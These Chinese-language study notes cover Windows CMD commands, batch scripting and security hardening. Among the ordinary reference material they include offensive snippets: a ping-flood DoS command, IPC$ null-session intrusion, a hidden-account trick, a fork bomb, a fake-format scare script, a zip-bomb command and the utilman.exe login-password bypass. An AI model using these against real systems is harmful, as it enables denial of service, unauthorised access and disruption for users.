Windows操作系统

一、Windows使用

1 控制面板

1.1 网络共享

高级选项——开启 / 关闭网络共享

2 快捷键

2.1 ctrl

Home / End:行首 / 尾

ctrl + Home / End :从光标处到行首 / 尾

ctrl + shift + Home / End :全选至行首 / 尾

ctrl + A:选取全部

ctrl + W:关闭所选窗口

ctrl + z:撤回

ctrl + shift + z:前进

ctrl + c:复制

ctrl + v:粘贴

ctrl + x:剪切

2.2 alt

alt + tab:切屏

2.3 win

win + v:系统剪切板。

二、CMD命令

1 命令类型

内部命令:物理内存中的一部分,系统自带,如:copy

外部命令:

  • 调用了C盘中的程序(命令可以改),如:mstsc(远程桌面),ping

  • 外部命令可以下载后安装使用,放入C:\Windows\System32可直接使用。

2 帮助

win+R输入cmd打开命令界面

命令 + /?:显示命令帮助

3 界面

3.1 自定义DOS界面

title + name:标题

mode:显示样式设置

mode row,col:设置行列值

color num:改变颜色

颜色整数值:Ten digits:背景颜色,one digit:字体颜色
title cmd demo
mode 12,24
color 07

3.2 chcp

<其他>参考连接

chcp:查看当前编码

chcp [nnn]:修改当前编码

语言 一般编码代码
UTF-8 65001
简体中文(GB2312) 936
繁体中文BIG5 950
日文 932
美国/加拿大英语 437
俄文 866
韩文 949

4 网络

4.1 wget

wget + url:爬取网站(存到当前路径下)

参数:

  • -r:递归全部爬取(慎用)
  • -l:设置层次
  • -o:设置输出位置

4.2 ipconfig

ipconfig :显示网络配置

参数:

  • /all:显示详细信息
  • /release:释放IP
  • /renew:重新获取IP
  • /flushdns:刷新DNS

4.3 ping

ping domain/IP:检测网络连通性。

参数:

  • -t:一直ping直到停止
  • -a:地址解析为主机名
  • -n num:指定数据包数量
  • -l large:指定数据包大小(字节)
  • -w timeout:指定超时时间(毫秒)(存疑:-w设置为大于0的数都能ping通)

Dos攻击:ping -l 65500 url -t

死亡之Ping:ping -l 65540 url -t(但是现在windows限制了数据包不能大于65500)

电脑打开热点后无法ping通127.0.0.1

4.4 telnet

打开telnet:control——程序和功能——启动或关闭Windows功能——Telnet客户端

telnet [host [port]]:连接端口(可用于检测端口是否开放)

4.5 netstat

netstat:显示协议统计信息和TCP/IP状态

命令参数:

  • -a:详细
  • -n:外部地址显示为 IP:port
  • -o:关联的进程号
  • -r:路由表

状态:

  • LISTENING(监听)
  • ESTABLISHED(连接)
  • CLOSED(关闭)
  • TIME-WAIT(等待足够时间)
查找指定端口
netstat -ano | findstr "port" | findstr ":port"

4.6 netsh

# 网络配置
netsh——int ip:进行ipv4配置
set address name="本地连接" source=static/dhcp (addr=ip mask=mask):设置本地ip
set address name="本地连接" gateway=ip gwmetric=1:设置网关

dump:显示配置脚本
netsh dump > path:导出配置到path

netsh winsock reset:重置Winsock目录(重新初始化网络环境,解决软件冲突、病毒原因造成的参数错误)
netsh int ip reset c:\resetlog.txt:重置TCP/IP协议,相当于重装TCP/IP协议,恢复到初次安装操作系统时的状态
# 防火墙配置
firewall:简单配置
advfirewall:高级配置

例子:
操作防火墙:netsh firewall set opmode mode=disable / enable(关闭 / 打开)
开启端口:netsh firewall set portopening TCP 3389 ENABLE
关闭端口:netsh firewall delete portopening TCP 3389
开启端口:netsh advfirewall firewall add rule name=baidujingyan dir=in action=allow protocol=TCP localport=3389
关闭端口:netsh advfirewall firewall delete rule name=baidujingyan dir=in action=allow protocol=TCP localport=3389

dirin / out(进站 / 出站)
action:allow / disallow(允许 / 不允许)
# wifi配置

netsh wlan show profiles:连接过的wifi
netsh wlan show profiles name="name" key=clear:查看wifi详细信息

4.7 arp

查询arp记录

命令参数:

  • /a:查询arp
  • /s IP mac:修改路由表

4.8 nsloopup

查询DNS记录

4.9 tracert

追踪网络

tracert + ip/域名:测试网络

4.10 msg

局域网发送消息

发送方:msg /server:127.0.0.1 * "Do you like van you see?"

接收方:需要在注册表中找到"计算机\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server",把"AllowRemoteRPC"的值改为1。

5 文件

5.1 start

start + 路径/网址:打开

带空格打开带 " "

命令参数:

  • /min:最小化打开
  • /max:最大化打开(默认)

例:start "C:\Program Files (x86)\Baidu"

5.2 call

程序互相调用

call + 路径:调用

调用完后会回到原来的程序。

5.3 sort

排序

sort + 路径:对文件内容排序(按ASCII码顺序)

命令参数:

  • /+n:从第n个字符开始排序
  • /r:升序变降序
  • /o + 路径:重定向输出

5.4 创建

创建隐藏文件夹

# 创建文件
cd. > a.txt
# 创建文件夹
md path

# 创建无法打开的文件夹
md e:\news..\

5.5 删除

rd + path:删除文件夹

del + path:删除文件

命令参数:

  • /f:强制删除只读文件
  • /s:删除所有子目录中的指定的文件
  • /q:安静模式。删除全局通配符时,不要求确认

5.6 ren

重命名文件

ren old new:重命名

5.7 move

移动文件

move old new:移动

5.8 attrib

更改文件属性

attrib:操作文件

命令参数:

  • +h:隐藏文件
  • -h:显示文件

5.9 cd

切换路径

切换盘: 直接盘名+: 例如:D:

切换路径 :cd + 路径

6 内容

6.1 set

显示、设置、删除 cmd.exe环境变量

# 显示环境变量
set
# 显示环境变量name
set name:
# 设置环境变量name值为xxx
set name=xxx
# 设置值为空(等于删除环境变量)
set name=
# 直接运算表达式的值(值可以赋给变量)
set /a <expr>
# 输入赋值(值可以赋给变量)
set /p <expr>

# 赋值案例
set /a var=4*5
set /p var=请输入数字

6.2 copy

拼接文件

copy

COPY[/D][/V][/N][/Y | /-Y][/Z][/A | /B ]source[/A |/B][+ source [/A | /B][+ ...]][destination[/A|/B]]
# source 指定要复制的文件。
/A # 表示一个 ASCII 文本文件。
/B # 表示一个二进位文件。
/D # 允许解密要创建的目标文件
# destinaton 为新文件指定目录和/或文件名。
/V # 验证新文件写入是否正确。
/N # 复制带有非 8dot3 名称的文件时,尽可能使用短文件名。
/Y # 不使用确认是否要改写现有目标文件的提示。
/-Y # 使用确认是否要改写现有目标文件的提示。
/Z # 用可重新启动模式复制已联网的文件。


# 案例
copy 111.jpg /b + a.txt /a test.php

6.3 type

查看文件内容

type [drive:][path]filename:显示内容

6.4 find

查找字符串(编码必须是ANSI)

find "str"

findstr str

6.5 时间管理

date:修改日期

time:修改时间

命令参数:

  • /t:只读

6.6 tree

树形查看文件列表

tree:以图形显示驱动器或路径的文件夹结构。

TREE [drive:][path][/F][/A]

命令参数:

  • /f:显示每个文件夹中文件的名称。
  • /a:使用 ASCII 字符,而不使用扩展字符。

6.7 dir

查看当前目录文件

dir:查看文件

命令参数:

  • /a:详细查看全部类型文件(可以选择具体只查看哪种文件)

6.8 systeminfo

systeminfo:获得设备运行状况

# 远程获得(system:ip地址,user:主机名,password:密码)
systeminfo /S system /U domain\user /P password

6.9 whoami

whoami:查询用户信息

命令参数:

  • /user:显示用户的SID

7 管理

7.1 磁盘管理

7.1.1 convert

转化卷

将 FAT 卷转换为 NTFS。

7.1.2 diskpart

磁盘管理

dispart:进入磁盘管理模式

list disk:列出磁盘
select disk n:选定第n块磁盘
creat partition primary:创建主分区
format fs=ntfs quick label="E:":定义磁盘
detail disk:显示磁盘分区
select partition n:选择第n磁盘分区
clean:格式化磁盘
exit:退出
7.1.3 sfc

修复系统文件(admin下执行)

扫描所有保护的系统文件的完整性,并使用正确的 Microsoft 版本替换不正确的版本。

sfc:扫描

/scannow:扫描并修复
/verifyonly:扫描不修复
或者指定文件
7.1.4 chkdsk

检查磁盘

检查磁盘并显示状态报告。

chkdsk [+磁盘名]:检查磁盘(不输入名字是全部磁盘)

/f:修复
/s:查找坏扇区并修复可读文件

7.2 net管理

7.2.1 net user

用户管理

net user [ name ]:查看用户

net user name [ passwd ]:对name用户进行操作

net user administrator passwd:(PowerShell打开)修改管理员密码
/add:添加用户(需要密码)
/del:删除用户
/active:no:禁用账户
/active:yes:启用账户
/Expires:设置账户过期时间(例:/Expires:nov,4,2018
/times:设置使用时段(例:/times:M-F,8:00-22:00;Sa-Su,19:00-21:00
net user name$ passwd /add:设置隐藏账户
7.2.2 net localgroup

本地组管理

net localgroup [name]:查看组

net localgroup [group] [user]:对用户在组中操作
/add:加入组
/del:离开组
7.2.3 net share 分享管理
net share:查看共享
net view + hostname:查看指定主机的共享

net share name=path:设置共享路径,共享名(name + $:默认共享)
net share name /del:取消共享
7.2.4 net stat 服务管理
net stat + service:开启服务
net stop + service:关闭服务
7.2.5 net use

IPC$弱连接入侵

net use:查看记录的新的网络连接
net use \\IP\ipc$ "" /user:"":建立空连接
net use \\IP\ipc$ "username" /user:"passwd":建立非空连接
net use z: \\IP\c$ "passwd" /user:"username":将对方C盘映射到本地Z盘
net use z: \\IP\c$:已经和目标建立了ipc$,则可以直接用IP+盘符+$访问
net use \\IP\ipc$ /del:删除一个ipc$连接
net use c: /del:删除共享映射c盘

7.3 进程管理

<其他>参考连接

7.3.1 tasklist

显示进程

tasklist:查看运行中的进程

tasklist | findstr pid :查看指定pid的进程信息
7.3.2 taskkill

杀死进程

taskkill /pid xxx -f :杀死进程(依照pid)
taskkill /im name /f :杀死进程(依照名字)
7.3.3 计划任务
(已弃用)at:查看计划任务
at time "exe":新加计划任务
at id /delete:删除计划任务

schtasks.exe:查看计划任务

7.4 系统管理

7.4.1 runas

临时提权

开启许可:secpol.msc——本地策略——安全选项——账户:管理员账户状态——开启

runas /noprofile /user:mymachine\administrator cmd:临时管理员打开CMD(mymachine:主机名)
runas /user:mymachine\administrator /sa "path":临时管理员打开程序
7.4.2 shutdown

关机

shutdown:关机

/i:图形化界面
/s:关机
/p:关机,无警告
/r:重启
/l:注销
/a:终止关机
/t time:多少秒后关机
7.4.3 slmgr

激活操作系统

查看操作系统信息或激活操作系统。

slmgr:帮助

/xpr:到期时间
/dli:详细信息
/upk:卸载密钥
/ipk + n:安装密钥
/skms name:设置密钥管理服务计算机名
/ato:成功激活产品
7.4.4 注册表管理
regedit:注册表编辑器
HKEY_CURRENT_USER:当前用户
HKEY_LOCAL_MACHINE:当前机器

reg:操作注册表
增删改查 

备份:reg export "key" file.reg
导出:file.reg / reg import file.reg
7.4.5 启动管理器
winver:win版本
taskmgr:任务管理器
compmgmt:计算机管理
lusrmgr.msc:用户管理
services.msc:服务管理
firewall.cpl:防火墙管理
gpedit.msc:本地组策略管理
secpol.msc:本地安全策略
regedit:注册表编辑器
eventvwr.msc :日志查看器
control:控制面板

三、Bat脚本

1 回显

@echo off@echo on 前者为关闭回显,后者为打开回显
当不想批处理文件中的命令一行一行在DOS中显示出来时(因为全部显示出来的话看起来会变得很杂乱),可以使用@echo off,将其放于程序的最上方就行了。

2 交互

输入:set /p expr:输入赋值(值可以赋给变量) 

输出:echo + 语句
语句:提示语句 
%variable%:显示变量值

例:echo you input:%var%


换行:
echo=
echo, 
echo; 
echo+ 
echo/ 
echo[ 
echo] 
echo: 
echo. 
echo\ 
效率依次递减

3 功能

rem 或 :: (双冒号):注释
cls:清屏
pause:暂停
exit:退出

4 占位符

%1 %2:第一个输入参数,第二个输入参数

5 goto 跳转

:label:标签
goto label:跳转到标签处

6 重定向

>:输出重定向(覆盖原记录)。案例:pause > nuldi>right.txt2>error.txt

>>:追加输出重定向(追加原记录)

<:输入重定向

句柄数字:

  1. 键盘输入
  2. 输出到命令提示符窗口
  3. 错误输出

7 特殊字符

案例:

  • 类似 if else:dir && echo success || echo failed
字符 作用
| 第一条命令结果作为第二条命令的参数
& 无论第一条命令是否成功都会执行后面的命令
&& 第一条命令成功了才会执行第二条命令
|| 第一条命令失败了才会执行第二条命令
() 将命令括起(不常用)
; 分隔命令或分隔命令参数(不常用)

8 出错码

echo %errorlevel%:输出错误码
errorlevel:查询上一条命令执行的错误码,0为执行成功

9 判断

if a ( b ) else ( c ):a条件,bc结果
if exist a ( b ) else ( c ):a条件,bc结果

10 循环

FOR %variable IN (set) DO command [command-parameters]

查找后缀为txt的文件
for /r path %i in (*.txt) do echo %i(脚本中为%%i)

11 bat封装成exe

bat转exe

winrar:

  • 压缩——后缀改为exe——自解压选项——设置——提取后运行——bat的path

  • path例子:./新建文件夹/1.bat

BatToExe:bat转化成exe的转化器

12 Bat脚本实例

12.1 死循环

%0:再次打开一次自己

%0 | %0
不断地自我重建,并占用所有的CPU资源。

12.2 伪格式化

@echo off
chcp 65001 > nul
Color 4A
Title 系统损坏器
echo 1 > nul
echo 正在卸载所有软件~~~~~
echo 正在格式化C盘 format c:\
echo 正在格式化D、E、F、G和接入的可移动储存设备 format d:\ e:\ f:\ g:\
echo 正在删除所有文件~~~~~
echo 系统发生严重错误!
echo :(
taskkill /f /im explorer.exe > nul
echo 15秒后电脑将恢复正常,千万别关闭界面,否则......
ping 127.0.0.1 -n 15 > nul
start c:\windows\explorer.exe
echo 哈哈哈哈哈哈哈哈哈
pause

12.3 浏览器

@echo off
chcp 65001
set /p var="请输入搜索:"
start https://www.sogou.com/sie?query=%var%
pause

12.4 找文件

tip:文件要是ANSI编码保存

@echo off
title 2.txt
set space= 
:start
set /p var=input name:
echo have
type 2.txt
echo=
echo choose
echo %var%
type 2.txt | findstr %var%
if %var%==exit (goto end) else (goto start)
:end
echo exit
pause

12.5 清除C盘垃圾

慎用,可能会删除C盘所有东西

tip:
%userprofile%\recent:最近访问文件记录的文件夹
%userprofile%\cookies:删除cookies
systemdrive=C:
windir=C:\windows
userprofile=C:\Users\Adminstrator

@echo off
echo del temp!
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %windir%\prefetch\*.* rd /s /q %windir%\temp & md %windir%\temp
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q %systemdrive%\*._mp
del /f /s /q %windir%\*.bak
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /q "%userprofile%\Local Settings\Temporary Internet Files\*.*
del /f /s /q "%userprofile"\recent\*.*"
echo end!
pause

12.6 win10添加本地用户和组策略

@echo off
pushd "%~dp0"
dir /b C:\Windows\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~3*.mum >List.txt
dir /b C:\Windows\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientTools-Package~3*.mum >>List.txt
for /f %%i in ('findstr /i . List.txt 2^>nul') do dism /online /norestart /add-package:"C:\Windows\servicing\Packages\%%i"
pause

12.7 压缩包炸弹

项目位置

视频演示

pythoon zipbomb.py —mode=quoted_overlap —num-files=num —compressed-size=size > new.zip

12.8 映像劫持

https://space.bilibili.com/493998035

四、Windows安全

author::视频

1 Windows Server

专门用于服务器

2 用户路径

用户开机自启动路径:C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

3 文件分类

系统文件:由系统软件构成的文件。大多数的系统文件只允许用户去调用但不允许用户读改,有的甚至不对用户开放。

用户文件:指由用户的源代码(.c)、目标文件(.obj)、可执行文件(.exe)、数据等所构成的文件。用户将这些文件委托给系统保管。

库文件:由标准子例程及常用的例程等所构成的文件。这类文件运行用户调用,但不允许修改。(如.dll)

4 文件系统

FAT系统:

  • FAT系统

  • FAT是File Allocation Table的缩写,即文件分配表。

NTFS系统:安全,先进,Windows特有的。

光盘文件系统:

  • UDF:UDF是统一光盘格式的缩写。采用标准的封装写入技术将CD-R当作硬盘来用,可在光盘上修改和删除文件。其基本原理是在进行烧录时先将数据打包,并在内存中临时建立一个特殊的文件目录表,同时接管系统对光盘的访问。

  • CDFS:Compact Disc File System,是一种适合光存储的文件系统,是用于光盘和光盘镜像的文件系统。

FAT系统和NTFS系统区别:img

5 Windows Server 用户和组

5.1 组

Administrators:组内账户有管理员权限,对计算机有最大控制权限,内置的系统管理员账户Administrator就是本地组成员,且无法把它从该组删除。默认无密码。

Guests:组内账号是没有用户信息、但需要访问本地计算机内资源的用户使用,该组的成员无法永久地改变其桌面的工作环境。常见默认成员为Guest。默认无密码。

Users:基本权利,比Guests强,新加的本地用户自动属于该组。

Remote Desktop Users:该组成员可以通过远程计算机登录。权限小于Users组账户高于Guests组账户,默认无法本地登录。

Event Log Readers:该组成员可以从本地计算机中读取事件日志。

5.2 访问控制

访问控制列表(Access Control List):访问权限决定着某个用户可以访问的文件和目录。

安全描述符(SD):

  • 规定了文件和文件夹的安全数据。

  • 安全描述符决定安全设置是否只对当前目录有效,或者可以传递给其他文件和目录。

SD组成:

  • SID(安全标识符):

    • 安全标识符(Security Identifier,SID)

    • 每个用户和账户组都有一个唯一的SID(通常情况下唯一),它是标识用户、用户组和计算机账户唯一的号码、由计算机名、当前时间、当前用户线程的CPU耗费时间,三个参数确定。

    • 帐号创建时同时被创建,一旦帐号被删除,安全标识同时也被删除。

    • 安全标识是唯一的,即使是相同的用户名,每次创建时获得的安全标识都是完全不同的。

    • 查看sid:sc showsid server

  • ACE(访问控制项):

    • 指访问控制实体,用于指定特定用户组的访问权限,是权限控制的最小单位。

    • ACE三种类型:拒绝访问、允许访问、系统审核(受信者访问对象时产生审核记录)

  • ACL(访问控制列表):是Windows中表示用户(组)权限的列表,ACL包含两种类型。一个是DACL(自主),一个是SACL(系统)。

UAC:

  • 用户账户控制

  • 是为了解决需要管理特权的应用程序问题,让最终用户配置为本地管理员。

5.3 账户策略

组路径(gpedit.msc):计算机配置——Windows设置——安全设置——账户策略——…

密码策略:

  • 决定密码的设置,如强制性和期限。(使用期限:最短大于最长将永不过期)

  • 账户锁定策略:决定系统锁定账户的时间,以及锁定谁的账户

计算机配置——Windows设置——安全设置——本地策略——…:

  • 审核策略:审核管理
  • 用户权限分配:本地权限
  • 安全选项:网络安全

5.4 端口

FTP:21

Telnet:23

SMTP:25:

  • Web界面:A —[http]—ISPServer—[SMTP]—ISPServer—[http]— B

  • 客户端:A —[SMTP]—ISPServer—[SMTP]—ISPServer—[POP3/IMAP]— B

  • 攻击:垃圾邮件,端口攻击

DNS:53:

  • 基于UDP

  • 攻击:DNS污染(域名对应错误IP)

DHCP:67(Server)/68(Client):

  • 67:接收下级客户请求分配IP

  • 68:向客户发请求成功或失败的回应

  • 自动分配方式:DHCP服务器为主机指定一个永久性的IP地址
  • 动态分配方式:DHCP服务器给主机指定一个具有时间限制的IP地址
  • 手工分配方式:客户端的IP地址是由网络管理员指定的IP地址
  • 攻击:DHCP欺骗(将IP获取完后自己搭建一个DHCP服务器将用户引入错误的网站)

http:80:

  • 建议:关闭80端口(提供web服务可以进行端口映射)

POP3:110:

  • 主要用于支持客户端远程管理在服务器上的电子邮件,但该协议是明文传输。

PRC:135:

  • 远程过程调用:分布式计算

NetBIOS:139:

  • 常见故障:弱连接,永恒之蓝

IMAP:143:

  • 直接对服务器的邮件进行操作。

  • 建议:加入SSL协议保证安全,加入后POP3S:995,IMAPS:993,SMTPS:465/994

https:443:

  • 建议:不发布网站建议关闭该协议。

  • https工作步骤:

    1. 客户端发起HTTPS请求
    2. 服务端配置
    3. 传送证书
    4. 客户端解析证书
    5. 传送加密信息
    6. 服务端解密信息
    7. 传输加密后的信息
    8. 客户端解密信息

远程桌面:3389:

  • 改端口号:
    1. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber
    2. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber
查看端口:netstat -ano | find ":port"
查看进程:tasklist | find "pid"

5.5 系统日志

日志查看器( eventvwr.msc )

应用程序日志:

  • %SystemRoot%\System32\winevt\Logs\Application.evtx

  • 记录操作系统组件产生的事件,例:驱动程序,系统组件,应用崩溃,数据丢失错误。

系统日志:

  • %SystemRoot%\System32\winevt\Logs\System.evtx

  • 记录应用程序和系统程序产生的事件,例:记录程序错误,开发人员自定义,处理程序调试。

安全日志:

  • %SystemRoot%\System32\winevt\Logs\Security.evtx

  • 记录安全审计事件,例:登录日志,对象访问日志,进程追踪日志,特权使用,账号管理,策略变更。

分析工具:

  • Log Parser
  • LogParser Lizard
  • Event Log Explorer

5.6 日志分析imgimg

5.7 WSUS:辅助补丁服务器

5.8 注册表安全

注册表编辑器:regedit / regedt32

注册表路径(%systemroot%\system32\config\):

  • DEFAULT:

    • ..\HKEY_USERS\.DEFAULT

  • SAM:

    • 安全账号管理

    • ..\HKEY_LOCAL_MACHINE\SAM

  • SECURITY:

    • ..\HKEY_LOCAL_MACHINE\Security

  • SOFTWARE:

    • ..\HKEY_LOCAL_MACHINE\Software

  • SYSTEM:

    • ..\HKEY_LOCAL_MACHINE\System\HKEY_CURRENT_CONFIG

  • NTUSER.DAT:

    • 用户配置文件

    • ..\HKEY_CURRENT_USER

注册表的五个一级分支:

  • HKEYCLASSES ROOT:存储Windows可识别的文件类型的详细列表,及相关联的程序

  • HKEY_CURRENT_USER:存储当前用户设置的信息

  • HKEY_LOCAL_MACHINE:包括安装在计算机上的硬件和软件的信息

  • HKEY_USERS:包含使用计算机的用户的信息

  • HKEY_CURRENT_CONFIG:这个分支包含计算机当前的硬件配置信息

案例:

  • win2008开启RDP:

    • reg add HKLM\STSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

  • win2008查RDP端口:

    • reg query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

  • 修改win服务远程端口:

    • [ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp ]
    • [ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp ]

  • 禁用任务管理器:

    • [ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System(新建项)\DisableTaskmgr(新建DWORD值) ] = 1

  • 修改IE主页:

    • [ HEKY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Default_Page_URL ] = url

6 AD域

6.1 AD域的概念

域是windows网络中独立运行的基本单位。

Active Directory(活动目录):是微软Windows Server中负责架构中大型网络环境的集中式目录管理服务(Directory Services)

工作组:本地,独立,分散的管理模式

域模式:主从管理

6.2 信任关系

信任关系:A信任B,B可以在身份认证后访问A的资源

被信任关系:与信任关系相反

6.3 管理

组策略

7 基线配置

7.1 身份鉴别

SAM:%SystemRoot%\system32\config\sam:相当于Linux中的shadow

wmic useraccount get name,sid:查看 name 和 sid(尾 500 是 admin,501 是 guest)

wmic csproduct get uuid:查看机器码

更改本地安全设置保证安全:

  • 本地组和用户——用户:admin 修改名称,guest 禁用(属性——常规)

  • 本地安全策略——密码:复杂性,不小于8位,口令小于90天,5次密码重复设定,6次失败认证锁定,锁定长于1分钟,复位设定,到期两周前提醒。

  • 本地安全策略——本地策略——网络访问:不允许枚举SAM账号和共享的枚举。

  • 本地安全策略——本地策略——安全选项:域成员禁止更改机器账户密码。

7.2 访问控制

计算机管理——本地组和用户——用户:共享账户检查

本地安全设置——本地策略——用户权限分配:关机权限(只给admin,本地和远程关机)

本地安全设置——本地策略——用户权限分配:文件权限(只给damin,取得文件或其他对象的所有权)

本地安全设置——本地策略——用户权限分配:账户本地登录

本地安全设置——本地策略——用户权限分配:账户网络访问(只给特定用户)

关闭默认共享:注册表——HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters\——增加AutoShareServer( type : REG_DWORD , value : 0 )

计算机管理——共享文件夹——共享:设置共享(不设置为 everyone)

服务——开启时间服务NTP服务(用于同步网络中服务器与客户端的时间)

windows文件权限:

  • 直接设置大于继承。
  • 拒绝大于允许。

移动、复制对权限继承性的影响:

  1. 在同一分区内移动文件或文件夹,权限保持不变。在不同分区间移动文件或文件夹,权限继承新位置的权限。
  2. 复制文件或文件夹,权限会继承新位置的权限。
  3. 把文件或文件夹移动或复制到 FAT 分区中时权限会丢失。

7.3 安全审计

7.4 资源控制

7.5 剩余信息保护

7.6 入侵防范

7.7 恶意代码防范

五、Winodws综合实践

1 巧用Windows事件日志“隐藏”载荷

巧用Windows事件日志“隐藏”载荷

2 同步网络时间

bat同步时间

bat同步时间

# 停时间服务
net stop w32time
# 开时间服务
net start w32time
# 同步时钟
w32tm /resync

3 绕过windows密码

下载:https://www.microsoft.com/zh-cn/software-download/windows10到U盘中

# 通过BIOS到安装位置,按shift+f10弹出cmd

# 获取所有可用的驱动器
wmic logicaldisk get name
# 找到位置并改掉轻松访问(因为轻松访问对应utilman.exe)
C: 
cd windows/system32
ren utilman.exe utilman2.exe
copy cmd.exe utilman.exe
# 点击轻松访问
net user username pwd